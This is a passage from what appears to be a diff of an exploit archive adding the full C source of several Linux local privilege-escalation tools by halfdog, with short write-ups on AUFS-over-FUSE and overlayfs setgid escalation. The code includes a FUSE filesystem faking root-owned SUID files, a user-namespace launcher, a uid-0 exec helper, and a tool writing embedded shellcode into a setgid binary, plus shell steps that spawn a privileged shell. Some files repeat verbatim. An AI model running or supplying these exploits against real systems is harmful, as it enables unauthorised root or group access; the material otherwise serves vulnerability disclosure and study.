exit(1);
}
// Create child; child commences execution in childFunc()
// CLONE_NEWNS: new mount namespace
// CLONE_NEWPID
// CLONE_NEWUTS
pid_t pid=clone(childFunc, child_stack+STACK_SIZE,
CLONE_NEWUSER|CLONE_NEWIPC|CLONE_NEWNET|CLONE_NEWNS|SIGCHLD, argv+argPos);
if(pid==-1) {
fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
char idMapFileName[128];
char idMapData[128];
if(!noSetGroupsFlag) {
sprintf(idMapFileName, "/proc/%d/setgroups", pid);
int setGroupsFd=open(idMapFileName, O_WRONLY);
if(setGroupsFd<0) {
fprintf(stderr, "Failed to open setgroups\n");
return(1);
}
result=write(setGroupsFd, "deny", 4);
if(result<0) {
fprintf(stderr, "Failed to disable setgroups\n");
return(1);
}
close(setGroupsFd);
}
if(setUidMapFlag) {
sprintf(idMapFileName, "/proc/%d/uid_map", pid);
fprintf(stderr, "Setting uid map in %s\n", idMapFileName);
int uidMapFd=open(idMapFileName, O_WRONLY);
if(uidMapFd<0) {
fprintf(stderr, "Failed to open uid map\n");
return(1);
}
sprintf(idMapData, "0 %d 1\n", getuid());
result=write(uidMapFd, idMapData, strlen(idMapData));
if(result<0) {
fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
close(uidMapFd);
}
if(setGidMapFlag) {
sprintf(idMapFileName, "/proc/%d/gid_map", pid);
fprintf(stderr, "Setting gid map in %s\n", idMapFileName);
int gidMapFd=open(idMapFileName, O_WRONLY);
if(gidMapFd<0) {
fprintf(stderr, "Failed to open gid map\n");
return(1);
}
sprintf(idMapData, "0 %d 1\n", getgid());
result=write(gidMapFd, idMapData, strlen(idMapData));
if(result<0) {
if(noSetGroupsFlag) {
fprintf(stderr, "Expected failed GID map write due to enabled group set flag: %d (%s)\n", errno, strerror(errno));
} else {
fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
}
close(gidMapFd);
}
if(waitpid(pid, NULL, 0)==-1) {
fprintf(stderr, "Wait failed\n");
return(1);
}
return(0);
}
--- EOF ---

615
platforms/linux/local/41761.txt
View file

@ -8,10 +8,12 @@ For a system to be exposed, unprivileged USERNS has to be available and AUFS sup
## AUFS Over Fuse: Loss of Nosuid
Method: Fuse filesystem can be mounted by unprivileged users with the help of the fusermount SUID program. Fuse then can simulate files of any type, mode, UID but they are only visible to the user mounting the filesystem and lose all SUID properties. Those files can be exposed using aufs including the problematic SUID properties. The basic exploitation sequence is:
Mount fuse filesystem exposing crafted SUID binary
Create USERNS
Mount aufs on top of fuse
Execute the SUID binary via aufs from outside the namespace
- Mount fuse filesystem exposing crafted SUID binary
- Create USERNS
- Mount aufs on top of fuse
- Execute the SUID binary via aufs from outside the namespace
The issue can then be demonstrated using:
SuidExec (http://www.halfdog.net/Misc/Utils/SuidExec.c)
@ -62,4 +64,607 @@ uid=1000(test) gid=8(mail) groups=8(mail),100(users)
On Ubuntu, exploitation allows interference with mail spool and allows to gain privileges of other python processes using python dist-packages owned by user root.staff. If root user calls a python process in that way, e.g. via apport crash dump tool, local root escalation is completed.
According to this post (http://www.openwall.com/lists/oss-security/2016/01/16/7), directories or binaries owned by group staff are in the default PATH of the root user, hence local root escalation is trivial.
According to this post (http://www.openwall.com/lists/oss-security/2016/01/16/7), directories or binaries owned by group staff are in the default PATH of the root user, hence local root escalation is trivial.
--- SuidExec.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2015 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* This tool changes to uid/gid 0 and executes the program supplied
* via arguments.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
extern char **environ;
int main(int argc, char **argv) {
if(argc<2) {
fprintf(stderr, "Usage: %s [execargs]\n", argv[0]);
return(1);
}
int rUid, eUid, sUid, rGid, eGid, sGid;
getresuid(&rUid, &eUid, &sUid);
getresgid(&rGid, &eGid, &sGid);
if(setresuid(sUid, sUid, rUid)) {
fprintf(stderr, "Failed to set uids\n");
return(1);
}
if(setresgid(sGid, sGid, rGid)) {
fprintf(stderr, "Failed to set gids\n");
return(1);
}
execve(argv[1], argv+1, environ);
return(1);
}
--- EOF ---
--- FuseMinimal.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2016 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* Minimal userspace file system demo, compile using
* gcc -D_FILE_OFFSET_BITS=64 -Wall FuseMinimal.c -o FuseMinimal -lfuse
*
* See also /usr/include/fuse/fuse.h
*/
#define FUSE_USE_VERSION 28
#include <errno.h>
#include <fuse.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
static FILE *logFile;
static char *fileNameNormal="/file";
static char *fileNameCharDev="/chardev";
static char *fileNameNormalSubFile="/dir/file";
static char *realFileName="./RealFile";
static int realFileHandle=-1;
static int io_getattr(const char *path, struct stat *stbuf) {
fprintf(logFile, "io_getattr(path=\"%s\", stbuf=0x%p)\n",
path, stbuf);
fflush(logFile);
int res=-ENOENT;
memset(stbuf, 0, sizeof(struct stat));
if(strcmp(path, "/") == 0) {
stbuf->st_mode=S_IFDIR|0755;
stbuf->st_nlink=2;
res=0;
} else if(strcmp(path, fileNameCharDev)==0) {
// stbuf->st_dev=makedev(5, 2);
stbuf->st_mode=S_IFCHR|0777;
stbuf->st_rdev=makedev(5, 2);
stbuf->st_nlink=1; // Number of hard links
stbuf->st_size=100;
res=0;
} else if(strcmp(path, "/dir")==0) {
stbuf->st_mode=S_IFDIR|S_ISGID|0777;
stbuf->st_nlink=1; // Number of hard links
stbuf->st_size=1<<12;
res=0;
} else if((!strcmp(path, fileNameNormal))||(!strcmp(path, fileNameNormalSubFile))) {
stbuf->st_mode=S_ISUID|S_IFREG|0777;
stbuf->st_size=100;
if(realFileName) {
if(fstat(realFileHandle, stbuf)) {
fprintf(logFile, "Stat of %s failed, error %d (%s)\n",
realFileName, errno, strerror(errno));
} else {
// Just change uid/suid, which is far more interesting during testing
stbuf->st_mode|=S_ISUID;
stbuf->st_uid=0;
stbuf->st_gid=0;
}
} else {
stbuf->st_mode=S_ISUID|S_IFREG|0777;
stbuf->st_size=100;
}
stbuf->st_nlink=1; // Number of hard links
res=0;
}
return(res);
}
static int io_readlink(const char *path, char *buffer, size_t length) {
fprintf(logFile, "io_readlink(path=\"%s\", buffer=0x%p, length=0x%lx)\n",
path, buffer, (long)length);
fflush(logFile);
return(-1);
}
static int io_unlink(const char *path) {
fprintf(logFile, "io_unlink(path=\"%s\")\n", path);
fflush(logFile);
return(0);
}
static int io_rename(const char *oldPath, const char *newPath) {
fprintf(logFile, "io_rename(oldPath=\"%s\", newPath=\"%s\")\n",
oldPath, newPath);
fflush(logFile);
return(0);
}
static int io_chmod(const char *path, mode_t mode) {
fprintf(logFile, "io_chmod(path=\"%s\", mode=0x%x)\n", path, mode);
fflush(logFile);
return(0);
}
static int io_chown(const char *path, uid_t uid, gid_t gid) {
fprintf(logFile, "io_chown(path=\"%s\", uid=%d, gid=%d)\n", path, uid, gid);
fflush(logFile);
return(0);
}
/** Open a file. This function checks access permissions and may
* associate a file info structure for future access.
* @returns 0 when open OK
*/
static int io_open(const char *path, struct fuse_file_info *fi) {
fprintf(logFile, "io_open(path=\"%s\", fi=0x%p)\n", path, fi);
fflush(logFile);
return(0);
}
static int io_read(const char *path, char *buffer, size_t length,
off_t offset, struct fuse_file_info *fi) {
fprintf(logFile, "io_read(path=\"%s\", buffer=0x%p, length=0x%lx, offset=0x%lx, fi=0x%p)\n",
path, buffer, (long)length, (long)offset, fi);
fflush(logFile);
if(length<0) return(-1);
if((!strcmp(path, fileNameNormal))||(!strcmp(path, fileNameNormalSubFile))) {
if(!realFileName) {
if((offset<0)||(offset>4)) return(-1);
if(offset+length>4) length=4-offset;
if(length>0) memcpy(buffer, "xxxx", length);
return(length);
}
if(lseek(realFileHandle, offset, SEEK_SET)==(off_t)-1) {
fprintf(stderr, "read: seek on %s failed\n", path);
return(-1);
}
return(read(realFileHandle, buffer, length));
}
return(-1);
}
static int io_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
off_t offset, struct fuse_file_info *fi) {
fprintf(logFile, "io_readdir(path=\"%s\", buf=0x%p, filler=0x%p, offset=0x%lx, fi=0x%p)\n",
path, buf, filler, ((long)offset), fi);
fflush(logFile);
(void) offset;
(void) fi;
if(!strcmp(path, "/")) {
filler(buf, ".", NULL, 0);
filler(buf, "..", NULL, 0);
filler(buf, fileNameCharDev+1, NULL, 0);
filler(buf, "dir", NULL, 0);
filler(buf, fileNameNormal+1, NULL, 0);
return(0);
} else if(!strcmp(path, "/dir")) {
filler(buf, ".", NULL, 0);
filler(buf, "..", NULL, 0);
filler(buf, "file", NULL, 0);
return(0);
}
return -ENOENT;
}
static int io_access(const char *path, int mode) {
fprintf(logFile, "io_access(path=\"%s\", mode=0x%x)\n",
path, mode);
fflush(logFile);
return(0);
}
static int io_ioctl(const char *path, int cmd, void *arg,
struct fuse_file_info *fi, unsigned int flags, void *data) {
fprintf(logFile, "io_ioctl(path=\"%s\", cmd=0x%x, arg=0x%p, fi=0x%p, flags=0x%x, data=0x%p)\n",
path, cmd, arg, fi, flags, data);
fflush(logFile);
return(0);
}
static struct fuse_operations hello_oper = {
.getattr = io_getattr,
.readlink = io_readlink,
// .getdir = deprecated
// .mknod
// .mkdir
.unlink = io_unlink,
// .rmdir
// .symlink
.rename = io_rename,
// .link
.chmod = io_chmod,
.chown = io_chown,
// .truncate
// .utime
.open = io_open,
.read = io_read,
// .write
// .statfs
// .flush
// .release
// .fsync
// .setxattr
// .getxattr
// .listxattr
// .removexattr
// .opendir
.readdir = io_readdir,
// .releasedir
// .fsyncdir
// .init
// .destroy
.access = io_access,
// .create
// .ftruncate
// .fgetattr
// .lock
// .utimens
// .bmap
.ioctl = io_ioctl,
// .poll
};
int main(int argc, char *argv[]) {
char buffer[128];
realFileHandle=open(realFileName, O_RDWR);
if(realFileHandle<0) {
fprintf(stderr, "Failed to open %s\n", realFileName);
exit(1);
}
snprintf(buffer, sizeof(buffer), "FuseMinimal-%d.log", getpid());
logFile=fopen(buffer, "a");
if(!logFile) {
fprintf(stderr, "Failed to open log: %s\n", (char*)strerror(errno));
return(1);
}
fprintf(logFile, "Starting fuse init\n");
fflush(logFile);
return fuse_main(argc, argv, &hello_oper, NULL);
}
--- EOF ---
--- UserNamespaceExec.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2015-2016 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* This tool creates a new namespace, initialize the uid/gid
* map and execute the program given as argument. This is similar
* to unshare(1) from newer util-linux packages.
*
* gcc -o UserNamespaceExec UserNamespaceExec.c
*
* Usage: UserNamespaceExec [options] -- [program] [args]
*
* * --NoSetGroups: do not disable group chanages
* * --NoSetGidMap:
* * --NoSetUidMap:
*/
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
extern char **environ;
static int childFunc(void *arg) {
int parentPid=getppid();
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
while((geteuid()!=0)&&(parentPid==getppid())) {
sleep(1);
}
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
int result=execve(((char**)arg)[0], (char**)arg, environ);
fprintf(stderr, "Exec failed\n");
return(1);
}
#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];
int main(int argc, char *argv[]) {
int argPos;
int noSetGroupsFlag=0;
int setGidMapFlag=1;
int setUidMapFlag=1;
int result;
for(argPos=1; argPos<argc; argPos++) {
char *argName=argv[argPos];
if(!strcmp(argName, "--")) {
argPos++;
break;
}
if(strncmp(argName, "--", 2)) {
break;
}
if(!strcmp(argName, "--NoSetGidMap")) {
setGidMapFlag=0;
continue;
}
if(!strcmp(argName, "--NoSetGroups")) {
noSetGroupsFlag=1;
continue;
}
if(!strcmp(argName, "--NoSetUidMap")) {
setUidMapFlag=0;
continue;
}
fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName);
exit(1);
}
// Create child; child commences execution in childFunc()
// CLONE_NEWNS: new mount namespace
// CLONE_NEWPID
// CLONE_NEWUTS
pid_t pid=clone(childFunc, child_stack+STACK_SIZE,
CLONE_NEWUSER|CLONE_NEWIPC|CLONE_NEWNET|CLONE_NEWNS|SIGCHLD, argv+argPos);
if(pid==-1) {
fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
char idMapFileName[128];
char idMapData[128];
if(!noSetGroupsFlag) {
sprintf(idMapFileName, "/proc/%d/setgroups", pid);
int setGroupsFd=open(idMapFileName, O_WRONLY);
if(setGroupsFd<0) {
fprintf(stderr, "Failed to open setgroups\n");
return(1);
}
result=write(setGroupsFd, "deny", 4);
if(result<0) {
fprintf(stderr, "Failed to disable setgroups\n");
return(1);
}
close(setGroupsFd);
}
if(setUidMapFlag) {
sprintf(idMapFileName, "/proc/%d/uid_map", pid);
fprintf(stderr, "Setting uid map in %s\n", idMapFileName);
int uidMapFd=open(idMapFileName, O_WRONLY);
if(uidMapFd<0) {
fprintf(stderr, "Failed to open uid map\n");
return(1);
}
sprintf(idMapData, "0 %d 1\n", getuid());
result=write(uidMapFd, idMapData, strlen(idMapData));
if(result<0) {
fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
close(uidMapFd);
}
if(setGidMapFlag) {
sprintf(idMapFileName, "/proc/%d/gid_map", pid);
fprintf(stderr, "Setting gid map in %s\n", idMapFileName);
int gidMapFd=open(idMapFileName, O_WRONLY);
if(gidMapFd<0) {
fprintf(stderr, "Failed to open gid map\n");
return(1);
}
sprintf(idMapData, "0 %d 1\n", getgid());
result=write(gidMapFd, idMapData, strlen(idMapData));
if(result<0) {
if(noSetGroupsFlag) {
fprintf(stderr, "Expected failed GID map write due to enabled group set flag: %d (%s)\n", errno, strerror(errno));
} else {
fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
}
close(gidMapFd);
}
if(waitpid(pid, NULL, 0)==-1) {
fprintf(stderr, "Wait failed\n");
return(1);
}
return(0);
}
--- EOF ---
--- CreateSetgidBinary.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* This tool allows to create a setgid binary in appropriate directory
* to escalate to the group of this directory.
*
* Compile: gcc -o CreateSetgidBinary CreateSetgidBinary.c
*
* Usage: CreateSetgidBinary [targetfile] [suid-binary] [placeholder] [args]
*
* Example:
*
* # ./CreateSetgidBinary ./escalate /bin/mount x nonexistent-arg
* # ls -al ./escalate
* # ./escalate /bin/sh
*
* Copyright (c) 2015-2017 halfdog <me (%) halfdog.net>
* License: https://www.gnu.org/licenses/lgpl-3.0.en.html
*
* See http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ for more information.
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <unistd.h>
#include <sys/wait.h>
int main(int argc, char **argv) {
// No slashes allowed, everything else is OK.
char suidExecMinimalElf[] = {
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,
0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00,
0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08,
0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8,
0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80, 0x31, 0xc0, 0x89, 0xd0,
0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80
};
int destFd=open(argv[1], O_RDWR|O_CREAT, 07777);
if(destFd<0) {
fprintf(stderr, "Failed to open %s, error %s\n", argv[1], strerror(errno));
return(1);
}
char *suidWriteNext=suidExecMinimalElf;
char *suidWriteEnd=suidExecMinimalElf+sizeof(suidExecMinimalElf);
while(suidWriteNext!=suidWriteEnd) {
char *suidWriteTestPos=suidWriteNext;
while((!*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
suidWriteTestPos++;
// We cannot write any 0-bytes. So let seek fill up the file wihh
// null-bytes for us.
lseek(destFd, suidWriteTestPos-suidExecMinimalElf, SEEK_SET);
suidWriteNext=suidWriteTestPos;
while((*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
suidWriteTestPos++;
int result=fork();
if(!result) {
struct rlimit limits;
// We can't truncate, that would remove the setgid property of
// the file. So make sure the SUID binary does not write too much.
limits.rlim_cur=suidWriteTestPos-suidExecMinimalElf;
limits.rlim_max=limits.rlim_cur;
setrlimit(RLIMIT_FSIZE, &limits);
// Do not rely on some SUID binary to print out the unmodified
// program name, some OSes might have hardening against that.
// Let the ld-loader will do that for us.
limits.rlim_cur=1<<22;
limits.rlim_max=limits.rlim_cur;
result=setrlimit(RLIMIT_AS, &limits);
dup2(destFd, 1);
dup2(destFd, 2);
argv[3]=suidWriteNext;
execve(argv[2], argv+3, NULL);
fprintf(stderr, "Exec failed\n");
return(1);
}
waitpid(result, NULL, 0);
suidWriteNext=suidWriteTestPos;
// ftruncate(destFd, suidWriteTestPos-suidExecMinimalElf);
}
fprintf(stderr, "Completed\n");
return(0);
}
--- EOF ---

340
platforms/linux/local/41762.txt
View file

@ -6,7 +6,7 @@ Source: http://www.halfdog.net/Security/2016/UserNamespaceOverlayfsXattrSetgidPr
Linux user namespace allows to mount file systems as normal user, including the overlayfs. As many of those features were not designed with namespaces in mind, this increase the attack surface of the Linux kernel interface.
Overlayfs was intended to allow create writeable filesystems when running on readonly medias, e.g. on a live-CD. In such scenario, the lower filesystem contains the read-only data from the medium, the upper filesystem part is mixed with the lower part. This mixture is then presented as an overlayfs at a given mount point. When writing to this overlayfs, the write will only modify the data in upper, which may reside on a tmpfs for that purpose.
Due to inheritance of Posix ACL information (xattrs) when copying up overlayfs files and not cleaning those additional and unintended ACL attribues, SGID directories may become user writable, thus allowing to gain privileges of this group using methods described in SetgidDirectoryPrivilegeEscalation. On standard Ubuntu system, this allows to gain access to groups staff, mail, libuuid.
Due to inheritance of Posix ACL information (xattrs) when copying up overlayfs files and not cleaning those additional and unintended ACL attribues, SGID directories may become user writable, thus allowing to gain privileges of this group using methods described in SetgidDirectoryPrivilegeEscalation (http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/). On standard Ubuntu system, this allows to gain access to groups staff, mail, libuuid.
## Methods
@ -18,7 +18,7 @@ Suitable target directories can be easily found using find / -perm -02020 2> /de
/var/mail (root.mail)
### Exploitation:
Exploitation can be done just combining standard tools with the SetgidDirectoryPrivilegeEscalation exploit. The following steps include command variants needed for different operating systems. They have to be executed in two processes, one inside the user namespace, the other one outside of it.
Exploitation can be done just combining standard tools with the SetgidDirectoryPrivilegeEscalation (http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/) exploit. The following steps include command variants needed for different operating systems. They have to be executed in two processes, one inside the user namespace, the other one outside of it.
### Inside:
@ -47,4 +47,338 @@ test$ ./CreateSetgidBinary test/[targetdir]/escalate /bin/mount x nonexistent-ar
test$ test/[targetdir]/escalate ./SuidExec /bin/bash
test$ touch x
test$ ls -al x
-rw-r--r-- 1 test [targetgroup] 0 Jan 16 20:39 x
-rw-r--r-- 1 test [targetgroup] 0 Jan 16 20:39 x
--- CreateSetgidBinary.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* This tool allows to create a setgid binary in appropriate directory
* to escalate to the group of this directory.
*
* Compile: gcc -o CreateSetgidBinary CreateSetgidBinary.c
*
* Usage: CreateSetgidBinary [targetfile] [suid-binary] [placeholder] [args]
*
* Example:
*
* # ./CreateSetgidBinary ./escalate /bin/mount x nonexistent-arg
* # ls -al ./escalate
* # ./escalate /bin/sh
*
* Copyright (c) 2015-2017 halfdog <me (%) halfdog.net>
* License: https://www.gnu.org/licenses/lgpl-3.0.en.html
*
* See http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/ for more information.
*/
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <unistd.h>
#include <sys/wait.h>
int main(int argc, char **argv) {
// No slashes allowed, everything else is OK.
char suidExecMinimalElf[] = {
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,
0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00,
0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08,
0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8,
0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80, 0x31, 0xc0, 0x89, 0xd0,
0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80
};
int destFd=open(argv[1], O_RDWR|O_CREAT, 07777);
if(destFd<0) {
fprintf(stderr, "Failed to open %s, error %s\n", argv[1], strerror(errno));
return(1);
}
char *suidWriteNext=suidExecMinimalElf;
char *suidWriteEnd=suidExecMinimalElf+sizeof(suidExecMinimalElf);
while(suidWriteNext!=suidWriteEnd) {
char *suidWriteTestPos=suidWriteNext;
while((!*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
suidWriteTestPos++;
// We cannot write any 0-bytes. So let seek fill up the file wihh
// null-bytes for us.
lseek(destFd, suidWriteTestPos-suidExecMinimalElf, SEEK_SET);
suidWriteNext=suidWriteTestPos;
while((*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
suidWriteTestPos++;
int result=fork();
if(!result) {
struct rlimit limits;
// We can't truncate, that would remove the setgid property of
// the file. So make sure the SUID binary does not write too much.
limits.rlim_cur=suidWriteTestPos-suidExecMinimalElf;
limits.rlim_max=limits.rlim_cur;
setrlimit(RLIMIT_FSIZE, &limits);
// Do not rely on some SUID binary to print out the unmodified
// program name, some OSes might have hardening against that.
// Let the ld-loader will do that for us.
limits.rlim_cur=1<<22;
limits.rlim_max=limits.rlim_cur;
result=setrlimit(RLIMIT_AS, &limits);
dup2(destFd, 1);
dup2(destFd, 2);
argv[3]=suidWriteNext;
execve(argv[2], argv+3, NULL);
fprintf(stderr, "Exec failed\n");
return(1);
}
waitpid(result, NULL, 0);
suidWriteNext=suidWriteTestPos;
// ftruncate(destFd, suidWriteTestPos-suidExecMinimalElf);
}
fprintf(stderr, "Completed\n");
return(0);
}
--- EOF ---
--- UserNamespaceExec.c ---
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2015-2016 halfdog <me (%) halfdog.net>
* See http://www.halfdog.net/Misc/Utils/ for more information.
*
* This tool creates a new namespace, initialize the uid/gid
* map and execute the program given as argument. This is similar
* to unshare(1) from newer util-linux packages.
*
* gcc -o UserNamespaceExec UserNamespaceExec.c
*
* Usage: UserNamespaceExec [options] -- [program] [args]
*
* * --NoSetGroups: do not disable group chanages
* * --NoSetGidMap:
* * --NoSetUidMap:
*/
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>
extern char **environ;
static int childFunc(void *arg) {
int parentPid=getppid();
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
while((geteuid()!=0)&&(parentPid==getppid())) {
sleep(1);
}
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
int result=execve(((char**)arg)[0], (char**)arg, environ);
fprintf(stderr, "Exec failed\n");
return(1);
}
#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];
int main(int argc, char *argv[]) {
int argPos;
int noSetGroupsFlag=0;
int setGidMapFlag=1;
int setUidMapFlag=1;
int result;
for(argPos=1; argPos<argc; argPos++) {
char *argName=argv[argPos];
if(!strcmp(argName, "--")) {
argPos++;
break;
}
if(strncmp(argName, "--", 2)) {
break;
}
if(!strcmp(argName, "--NoSetGidMap")) {
setGidMapFlag=0;
continue;
}
if(!strcmp(argName, "--NoSetGroups")) {
noSetGroupsFlag=1;
continue;
}
if(!strcmp(argName, "--NoSetUidMap")) {
setUidMapFlag=0;
continue;
}
fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName);
exit(1);
}
// Create child; child commences execution in childFunc()
// CLONE_NEWNS: new mount namespace
// CLONE_NEWPID
// CLONE_NEWUTS
pid_t pid=clone(childFunc, child_stack+STACK_SIZE,
CLONE_NEWUSER|CLONE_NEWIPC|CLONE_NEWNET|CLONE_NEWNS|SIGCHLD, argv+argPos);
if(pid==-1) {
fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
char idMapFileName[128];
char idMapData[128];
if(!noSetGroupsFlag) {
sprintf(idMapFileName, "/proc/%d/setgroups", pid);
int setGroupsFd=open(idMapFileName, O_WRONLY);
if(setGroupsFd<0) {
fprintf(stderr, "Failed to open setgroups\n");
return(1);
}
result=write(setGroupsFd, "deny", 4);
if(result<0) {
fprintf(stderr, "Failed to disable setgroups\n");
